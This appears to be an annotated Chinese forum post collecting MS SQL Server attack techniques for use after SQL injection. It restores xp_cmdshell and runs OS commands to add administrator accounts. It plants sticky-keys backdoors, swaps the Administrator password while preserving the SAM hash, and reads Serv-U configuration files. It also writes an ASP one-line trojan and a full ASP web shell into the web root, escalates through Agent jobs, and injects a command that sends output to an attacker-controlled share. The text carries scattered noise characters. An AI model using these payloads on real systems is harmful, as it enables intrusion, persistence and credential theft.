1 未能找到存储过程 'master..xp_cmdshell'（错误提示里写成了 xpcmdshell，实际名称是 xp_cmdshell）。先执行 EXEC master.dbo.sp_addextendedproc 重新注册，再按下面三种方法之一恢复；在注入点上执行时，语句前加一个空格、末尾加分号。注意：下面所有 sp_addextendedproc / sp_dropextendedproc 操作都需要 sysadmin 权限，DLL 必须位于 SQL Server 服务账户可读的本地路径（默认为实例的 Binn 目录）。
" x8 G* B9 E/ ~1 W" o0 ]. S恢复方法:查询分离器连接后,
第一步执行：EXEC sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'（原帖这一行末尾多出的 declare @o int 与本步无关，可忽略）
第二步执行：sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'（注意：xp_cmdshell 在 SQL Server 2000 中由 xplog70.dll 导出，第一步成功后就不必再执行第二步；下面第 2、3 节的错误正是把 xp_cmdshell 注册到了错误的 DLL 上造成的）
然后按F5键命令执行完毕
6 M$ ~; e7 `: L2 J# n3 ?; a M& l
2 无法装载 DLL xpsql70.dll 或该 DLL 所引用的某一 DLL。原因 126（找不到指定模块。）—— 说明 xp_cmdshell 被注册到了一个不存在或无法加载的 DLL 上。
恢复方法：用查询分析器连接后，
第一步执行：EXEC master.dbo.sp_dropextendedproc 'xp_cmdshell'（用单引号；双引号在 QUOTED_IDENTIFIER ON 时会被当作标识符而报错）
第二步执行：EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'（原帖此处写的是 xpsql70.dll，但上面的错误 126 正是该 DLL 无法加载引起的，再注册回同一个 DLL 不会解决问题；xp_cmdshell 的宿主 DLL 是 xplog70.dll，见“恢复所有存储过程”一节）
然后按F5键命令执行完毕
; V; U. B% o \$ e+ ?5 ~
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因：127（找不到指定的程序。）—— 说明 DLL 能加载，但其中没有 xp_cmdshell 这个导出函数。
恢复方法：用查询分析器连接后，
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行：exec sp_addextendedproc 'xp_cmdshell','xplog70.dll'（原帖此处写的是 xpweb70.dll，而错误 127 已经说明 xpweb70.dll 里没有 xp_cmdshell，重新注册到它没有意义）
然后按F5键命令执行完毕
) K1 t; t) M4 z; b5 K8 i' |2 o* `' x4 M9 @4 \! L0 o% L1 Z
4 终极方法.
如果以上方法均不可恢复，请尝试用下面的办法直接添加帐户（依赖 sp_OACreate：需要 sysadmin 权限，SQL 2005 起还要先打开 'Ole Automation Procedures'；新建的账户会出现在本机账户列表和安全日志中）：
用查询分析器连接后，
Windows 2000 Server 系统（系统目录为 c:\winnt）：
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
7 Y; n8 ~: Z, U' [' u- `: g. }) l/ p
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
Windows XP 或 2003 Server 系统（系统目录为 c:\windows）：
" \9 t" v3 p* M! y8 b5 \0 Q4 K' t4 V0 Z. Z& }9 I1 w
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
" d0 P' u+ Z% `. e7 n
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
3 C0 P" X- n& h& `- [; M2 \0 u" O- F. l1 h q; \
& o4 G6 Q$ s) A
五个 SHIFT（粘滞键后门）：用 explorer.exe 覆盖 sethc.exe，登录界面连按五次 Shift 就会以 SYSTEM 身份弹出 explorer。第二条语句把同一文件再复制到 dllcache，目的是防止 Windows 文件保护（WFP）把原版 sethc.exe 还原回去。
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
& B! @- P& P- v) i
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
* K# O& t" ?5 n4 J2 O% g1 Z" m. C& b3 e U
xp_cmdshell 执行命令的另一种写法（把过程名拆成字符串再拼接，只能绕过对 "xp_cmdshell" 字面量的简单过滤，不能绕过权限检查）：
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
, j. `7 _ W; m. e
判断存储扩展是否存在
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回 1 表示扩展存储过程已注册（只说明它存在，不说明其 DLL 能加载、也不说明当前登录有执行权限）。
4 ~8 o5 d' G+ b- ]! Z% o! ]6 g
1 ^8 k6 k! m4 V- p. x* Y8 p; l
上传 xplog70.dll 后恢复 xp_cmdshell 的语句（路径必须是 SQL Server 服务账户可读的本地路径）：
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'
& a9 s; G7 `0 `+ Y3 R" L/ \0 L6 K
否则上传 xplog70.dll 到系统目录后执行：
Exec master.dbo.sp_addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'（原帖漏写了 sp_ 前缀，master.dbo.addextendedproc 并不存在）
! d9 z! @% b4 X5 T. I; K9 [7 i8 X6 L; w/ ?. w8 u% @
2 H* H+ x& Y2 F' e! q% _5 Y+ T$ k
首先设置 Jet 的沙盒模式（SandBoxMode）：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 —— 注意：按微软对该键的说明，0 = 始终关闭沙盒，1 = 仅对非 Access 应用启用沙盒，2 = 仅对 Access 应用启用，3 = 始终启用。从 SQL Server 经 OLE DB 调用属于“非 Access 应用”，所以写 1 反而会拦截 shell()，实际要写 0（或 2）。执行前先用 xp_regread 读出原值，用完后还原。
& S8 c. C$ K# q6 m4 e# @
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')（SQL 2005 起需先打开 'Ad Hoc Distributed Queries'，见下文；命令以 SQL Server 服务账户身份执行）
如果返回“不能找到 c:\windows\system32\ias\ias.mdb”错误，用 exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 查看，发现 c:\windows\system32\ias\ias.mdb 没了，应该是被管理员删掉了，另一个 mdb 也没了。这里只是需要一个服务账户可读的 .mdb 文件，ias.mdb 是因为系统自带才被选用。
% A: P! E# X r/ s7 h8 q: Z( f5 r; P1 `
, C4 s+ h8 T$ E& |6 O* q
如果 sp_addextendedproc 本身被删除，按下面的定义重建（在 master 库中以 sysadmin 执行）：
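-- Rebuilds master..sp_addextendedproc after it has been dropped.
-- Run in master as sysadmin. The body is the SQL Server 2000 system
-- definition (dated 1996/08/30 20:13 in the original) with the forum
-- noise characters removed from the source lines.
--   @functname  (owner.)name of the function to register
--   @dllname    DLL exporting that function (resolved by the service account)
-- Returns 0 on success, 1 when called inside an open transaction.
create procedure sp_addextendedproc --- 1996/08/30 20:13
    @functname nvarchar(517), /* (owner.)name of function to call */
    @dllname   varchar(255)   /* name of DLL containing function */
as
    -- dbcc addextendedproc must not run inside a user transaction
    set implicit_transactions off
    if @@trancount > 0
    begin
        raiserror(15002, -1, -1, 'sp_addextendedproc')
        return (1)
    end
    -- registers the exported function as an extended stored procedure
    dbcc addextendedproc( @functname, @dllname)
    return (0) -- sp_addextendedproc
GO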
! Q' z: z* O; Z2 g% F
1 V# m3 J8 Q9 _2 T" ^) w- R! U; k7 z9 T- q3 r% @! `/ ^: F: J/ T
; g' O, w7 {+ F% g
导出管理员密码文件
sa 能否读 SAM 键取决于 SQL Server 的服务账户：HKLM\SAM 默认只有 SYSTEM 可读，所以下面的 reg export 只有在服务以 LocalSystem 运行时才会成功。
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg（000001F4 = RID 500，即内置 Administrator；先把原口令散列所在的键导出备份）
net user administrator test（改掉管理员口令，容易被用户察觉，并会写入安全日志）
用administrator登陆.
用完机器后
reg import c:\old.reg（原帖写成 c:\test.reg，与上面导出的文件名不一致；必须导入第一步导出的那个文件才能还原原来的口令散列）
根本不用克隆账户。
要操作其他账户时，先找到对应账户的 RID（Users 下以 RID 十六进制值命名的子键）。
2 K! _- H7 f& a% T8 L8 i
. Z. S: v. N; {) b. w2 c' M
7 N# g: B& ~- l$ Q1 b8 L* o
恢复所有扩展存储过程（下列 DLL 均为 SQL Server 2000 Binn 目录自带，需要 sysadmin 权限）：
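-- Re-registers the standard SQL Server 2000 extended stored procedures
-- after they have been dropped. Requires sysadmin; every DLL named here
-- ships in the instance's Binn directory and is loaded by the service
-- account. Forum noise characters removed from the original lines.
use master
-- xplog70.dll: login/group procedures (xp_cmdshell is registered from this DLL too)
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
-- odsole70.dll: OLE Automation (sp_OA*) procedures used by the FSO/WScript tricks above
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
-- xpstar.dll: registry, drive and file-system procedures
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'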
1 ?) G& j* m6 k; S3 B
建立读文件的存储过程（基于 BULK INSERT，需要 bulkadmin 或 sysadmin 权限，文件以 SQL Server 服务账户的权限读取）：
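-- Returns the lines of a text file on the SQL Server host as a result set.
--   @filename  full path of the file; it is opened by the SQL Server service
--              account, so the account's file permissions apply.
-- Requires bulkadmin or sysadmin. Each line is limited to 8000 characters.
Create proc sp_readTextFile @filename sysname
as
begin
    set nocount on
    Create table #tempfile (line varchar(8000))
    -- BULK INSERT only accepts a literal data-file name, so the statement is
    -- built dynamically. quotename(..., '''') wraps the path in single quotes
    -- and doubles any embedded quote, so the parameter cannot break out of the
    -- literal (the original concatenated it raw inside double quotes, which
    -- additionally only parses with QUOTED_IDENTIFIER OFF).
    exec ('bulk insert #tempfile from ' + quotename(@filename, ''''))
    select * from #tempfile
    drop table #tempfile
End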
7 I# Z8 }# @2 S8 e# W
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' —— 利用上面建立的存储过程读文件
查看登录用户
Select * from master..sysxlogins（SQL 2000 的登录表，包含口令散列列；SQL 2005 及以后改用 sys.server_principals / sys.sql_logins）
' K$ x. Z+ @9 e7 A
把文件内容读取到表中：
BULK INSERT tmp from 'c:\test.txt'（文件名用单引号；目标表 tmp 须先建好，见下面的 create table）
delete from 表名 —— 清理表里的内容
9 o+ Z& M* j) ~% b( h" hcreate table b_test(fn nvarchar(4000));建一个表,字段为fn8 r2 d7 H$ I) _8 S* R: y8 F. J; G
# ^- W8 s/ G& S' ]+ D K
& I& D0 y- [+ \$ n4 o9 _+ r1 H
添加一个 sysadmin 登录（权限等同 sa；它会出现在 syslogins 中，是很容易被发现的痕迹）：
exec master.dbo.sp_addlogin 'user','pass';
exec master.dbo.sp_addsrvrolemember 'user','sysadmin'
: p# t* F1 y5 A: [; U
# d" G( Y& I' X% V4 ?5 p3 k3 g6 Q
: G0 k& v2 x3 n+ O
读文件代码
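-- Prints a text file line by line through Scripting.FileSystemObject.
-- Needs sp_OACreate rights (sysadmin; on 2005+ 'Ole Automation Procedures'
-- must be on) and reads the file as the SQL Server service account.
-- '文件名' is the author's placeholder for the file path.
declare @o int, @f int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
-- OpenTextFile(path, 1): mode 1 = ForReading
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
exec @ret = sp_oamethod @f, 'readline', @line out
-- sp_OAMethod returns 0 on success; ReadLine fails at end of file, which ends the loop
while( @ret = 0 )
begin
    print @line
    exec @ret = sp_oamethod @f, 'readline', @line out
end
-- release the COM objects so the file handle is closed (the original leaked them)
exec sp_oadestroy @f
exec sp_oadestroy @o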
/ E8 w( X z7 x( i h4 z
写文件代码（createtextfile 的第二个参数 1 表示覆盖：会整个替换现有的 ServUDaemon.ini，而不是追加；写入以 SQL Server 服务账户的权限进行）：
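-- Writes one line to a text file through Scripting.FileSystemObject.
-- CreateTextFile(path, 1): the second argument (overwrite = true) replaces
-- the existing ServUDaemon.ini instead of appending to it. Needs sp_OACreate
-- rights and writes as the SQL Server service account.
-- '《内容》' is the author's placeholder for the text to write.
declare @o int, @f int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, '《内容》'
-- close the stream and release the COM objects so the data is flushed (the original did neither)
exec sp_oamethod @f, 'close'
exec sp_oadestroy @f
exec sp_oadestroy @o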
0 F% m( S6 I7 p2 u4 p0 Y6 \5 z3 E% c9 G" @. c' f! ]
, J4 }) b9 M- }+ l
添加 lake2 的 xplake2.dll 扩展存储过程（第三方 DLL，需先上传到服务账户可读的路径；注册、执行、卸载三步的正确顺序是 add → EXEC → drop）：
3 B$ t) ], x. q" n6 Xsp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
sp_dropextendedproc xp_lake2（用完后卸载；原帖把它排在 EXEC 之前，实际应在执行之后）
EXEC xp_lake2 'net user'
* f8 @2 T# e9 t0 @! J2 R* S; k& D, Z
得到硬盘文件信息
--参数说明：目录名，目录深度（0 = 不限），是否显示文件（1 = 显示）
execute master..xp_dirtree 'c:'
execute master..xp_dirtree 'c:',1
execute master..xp_dirtree 'c:',1,1
9 k1 }2 {3 k6 t1 B' f7 t* h/ W. T
2 s+ D0 k3 E) y+ S }4 M9 ~9 r# p& d! K2 x# P9 D, R# h! q
读serv-u配置信息
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
' {+ `4 u% K' D( g( ^; {% L0 e! B; I, ]7 g5 i7 z6 C+ D
通过 xp_regwrite 写 SHIFT 后门（IFEO 映像劫持：把 sethc.exe 的 Debugger 指向 cmd.exe，登录界面连按五次 Shift 即以 SYSTEM 身份打开 cmd）：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--（Debugger 值通常只写 cmd.exe 的完整路径，末尾的 on 不是 IFEO 的语法，疑为原帖笔误，执行前请确认）
8 }# B0 G+ i% Z1 x4 z
" a; Z5 V& z- b P
* j" o6 \2 e) z4 s2 u3 ~4 q
找到 web 路径，然后用 exec master.dbo.xp_subdirs 'd:\web\www.xx.com'; 列出子目录
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select ''<%execute(request("SB"))%>''' —— 写出一句话木马即可（sp_makewebtask 属于 Web Assistant，新版本 SQL Server 已移除；写文件以 SQL Server 服务账户身份进行）
, q3 f* {7 C6 J: A2 X2 ]2 v- c2 O: ^/ M
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp', @query = 'SELECT 你的字段 FROM 你建的临时表'
# e, f% M* P* R1 X' `4 f' L* d8 ~# j: ?4 g3 j. l3 D. a
' e# I' l& i9 g/ v+ @+ @# Y. \& G( J& o5 V/ x9 y/ c" z
SQL Server 2005 及以后开启 xp_cmdshell 的办法（需要 sysadmin 或 ALTER SETTINGS 权限；改动会反映在 sys.configurations 里）：
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
2 a7 q, q2 B- n' @
SQL 2005 开启 'OPENROWSET'（Ad Hoc Distributed Queries）支持的方法：
* Y5 a% r3 p$ w+ n" l/ s( x9 E
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
! ]7 ^. A" j$ o5 W. L
SQL 2005 开启 'sp_oacreate'（Ole Automation Procedures）支持的方法：
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
6 }+ Q+ c6 `% h( z! }/ g' Z1 z6 ^5 I9 C* ^1 q, s% Y, a
. f# x- O4 X& ^" }& M/ t; T
/ P9 c6 J* D& F& A8 T b' S7 m8 l+ n% G4 b% S; S e: y% c% B
8 [$ R* l: s' V; e1 u; l& v; C3 S# r4 j( v' {
& v M9 f9 B6 T$ U. L4 c: ~
6 O5 m5 q; a& i' _2 g6 \" V0 L
M! f. V$ x7 f1 o( y6 C- V% d2 ^6 W+ J" E- F) Z" f, T- C
, C' ?: t% z$ G1 W
1 ?1 C7 e$ a) B9 S, Q
- t0 H4 E" [+ f+ L! L+ P; T9 z1 m1 Y1 E6 p1 e! R# U* g1 J
9 z4 P6 v9 E% `1 E( s4 m7 ^
S# i' j& e7 ?8 a7 ^* d' [% \- k: F+ z+ u: B
' \8 ]4 ^* ^+ v, ]+ |5 o1 K& ~. [. S1 L5 Y1 t
/ f2 P0 ^ [9 X4 }
# b5 W9 h. m h+ R8 O) f6 C3 I
7 s$ ] X; d# B' g% T0 {" P- _' e" p- p; e! h" N7 n `$ R
以下方法原作者未全部验证能否成功，暂留作研究：
4)
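-- Runs an OS command through a SQL Server Agent job (CMDEXEC subsystem).
-- The step executes under the SQL Server Agent service account, so the Agent
-- service must be running. String delimiters were stripped by the forum and
-- have been restored here.
use msdb; -- the job procedures live in msdb, not master
exec sp_add_job @job_name = 'czy82';
exec sp_add_jobstep @job_name = 'czy82', @step_name = 'Exec my sql', @subsystem = 'CMDEXEC', @command = 'dir c:\>c:\b.txt';
-- @server_name must be this instance's name (select @@SERVERNAME); 'smscomputer' is the author's host
exec sp_add_jobserver @job_name = 'czy82', @server_name = 'smscomputer';
exec sp_start_job @job_name = 'czy82';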
2 X. Y# Z$ j( x! e8 N1 r6 p8 c' ]+ |8 m4 `: _7 s" S0 E h) |
利用 MSSQL 的作业（SQL Server Agent Job）也是可以执行命令的；而且如果上面的 @subsystem 参数是 TSQL，后面的 @command 就可以
执行tsql语句了.
使用这几个存储过程时，第一，@server_name 要指定 SQL 服务器名（可用 select @@SERVERNAME 查到）；
第二，系统的 SQLSERVERAGENT 服务必须已启动（默认没打开）；作业步骤是以 SQL Server Agent 服务账户的身份执行的，而不是提交者的权限。
net start SQLSERVERAGENT（这是操作系统命令，需要已有 xp_cmdshell 或主机上的执行权限才能跑）
5 y! z8 w5 t* K7 R5 o6 ]
这个方法还有一个不同之处：public 角色也可以执行。这是 SQL Server 2000 Agent 作业的已知提权问题，后续补丁和新版本已收紧 msdb 中的作业权限。看下面的：
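-- SQL Server 2000: a TSQL job step runs as the SQL Server Agent service
-- account, so a low-privileged (public) login could reach xp_cmdshell via
-- xp_execresultset. String delimiters were stripped by the forum; the nested
-- quoting of @command is restored below and should be re-checked before use.
USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL',
    @enabled = 1,
    @description = 'This will give a low privileged user access to xp_cmdshell',
    @delete_level = 1   -- delete the job once it has run successfully
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
    @step_name = 'Exec my sql',
    @subsystem = 'TSQL',
    -- xp_execresultset runs each row returned by the inner SELECT as a T-SQL batch;
    -- unescaped, the command reads:
    --   exec master..xp_execresultset N'select ''exec master..xp_cmdshell "dir > c:\agent-job-results.txt"'',N'Master'
    @command = 'exec master..xp_execresultset N''select ''''exec master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
    @server_name = '你的SQL的服务器名'  -- replace with this instance's name (select @@SERVERNAME)
EXEC sp_start_job @job_name = 'GetSystemOnSQL'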
$ y4 N: w# h9 U5 j
不要怀疑上面的代码，原作者是测试成功了的。这里要注意 xp_execresultset：正是因为它
才让我们能以 public 身份执行 xp_cmdshell（作业步骤实际以 SQL Server Agent 的服务账户运行）。
5) 关于 Microsoft SQL Agent Jobs 任意文件删除/覆盖漏洞（public 用户也可以）
安焦（xfocus）有文章：http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
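-- SQL Server 2000 Agent job with @output_file_name: the TSQL step's output is
-- written to an arbitrary path by the Agent service account, which lets a
-- public login create or overwrite files (see the xfocus advisory above).
-- String delimiters were stripped by the forum and have been restored.
USE msdb
EXEC sp_add_job @job_name = 'ArbitraryFilecreate',
    @enabled = 1,
    @description = 'This will create a file called c:\sqlafc123.txt',
    @delete_level = 1
EXEC sp_add_jobstep @job_name = 'ArbitraryFilecreate',
    @step_name = 'SQLAFC',
    @subsystem = 'TSQL',
    @command = 'select ''hello, this file was created by the SQL Agent.''',
    -- the step's result set (preceded by the Agent header shown below) is written here
    @output_file_name = 'c:\sqlafc123.txt'
EXEC sp_add_jobserver @job_name = 'ArbitraryFilecreate',
    @server_name = 'SERVER_NAME'  -- replace with this instance's name (select @@SERVERNAME)
EXEC sp_start_job @job_name = 'ArbitraryFilecreate'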
1 J) j* `% s" z" @& d2 d
如果 @subsystem 选的是 TSQL，生成的文件头部会带有如下内容（SQL Agent 写入的作业名/步骤名/开始时间）：
Job 'ArbitraryFilecreate' : Step 1, 'SQLAFC' : Began Executing 2003-02-07 18:24:19（原帖此处为 Unicode 乱码，内容大致如此）
----------------------------------------------
hello, this file was created by the SQL Agent.
3 ?# N* ~0 _2 |7 p+ I
(1 row(s) affected)（原帖此处乱码，是查询结束时的行数提示）
& G. b" X% Y, ^; F; U
所以建议要生成文件时 @subsystem 最好选 CMDEXEC（不会带 TSQL 的文件头和行数提示）；利用得好的话，可以写一个带添加管理员
命令的 vbs 文件到启动目录！
6) 关于 sp_makewebtask（可以写任意内容、任意文件名的文件）
关于 sp_MScopyscriptfile 看下面的例子：
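-- Command injection through sp_MScopyscriptfile (a replication helper): the
-- script-file argument apparently reaches a shell, so a pipe in the "file
-- name" runs @command. Marked as untested by the original author. String
-- delimiters were stripped by the forum and are restored here; the second
-- argument to sp_MScopyscriptfile was lost in the paste -- TODO confirm the
-- procedure's signature before use.
declare @command varchar(100)
declare @scripfile varchar(200)
-- keep the concatenation below from collapsing to NULL
set concat_null_yields_null off
select @command = 'dir c:\ > "\\attackerip\share\dir.txt"'
select @scripfile = 'c:\autoexec.bat > nul" | ' + @command + ' | rd "'
exec sp_MScopyscriptfile @scripfile, ''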
这两个方法原作者都还在测试中，未经验证。
让 MSSQL 的 public 用户得到一个本机的 web shell（前提：sp_makewebtask 对 public 可执行——SQL 2000 的情况，且 SQL Server 服务账户对 Web 目录有写权限；写出的 ASP 以 IIS 进程身份运行）：
7 F* F" g$ y( R, h6 V- }
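-- Writes an ASP command-execution page into the web root with sp_makewebtask
-- (SQL Server 2000 Web Assistant; the post claims public may call it, and it
-- has been removed from later versions). The SQL Server service account
-- performs the write; the resulting page runs as the IIS worker, not as SQL.
-- T-SQL string delimiters were stripped by the forum and are restored: the
-- ASP body uses only double quotes, so only the outer '' doubling is needed.
-- The forum also ate the "P" in "POST" and "<PRE>"; both are restored.
sp_makewebtask @outputfile = 'd:\sms\a.asp', @charset = 'gb2312',
--@query = 'select ''<img src=vbscript:msgbox(now())>''',
--@query = 'select ''<%response.write request.servervariables("APPL_PHYSICAL_PATH")%>''',
@query = 'select ''
<%On Error Resume Next
Set oscript = Server.createObject("wscript.SHELL")
Set oscriptNet = Server.createObject("wscript.NETWORK")
Set oFileSys = Server.createObject("scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <>"")Then
szTempFile = "C:\" & oFileSys.GetTempName()
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
End If %>
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
</FORM><PRE>
<% If (IsObject(oFile))Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.deleteFile(szTempFile, True)
End If%>
</BODY></HTML>'''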
|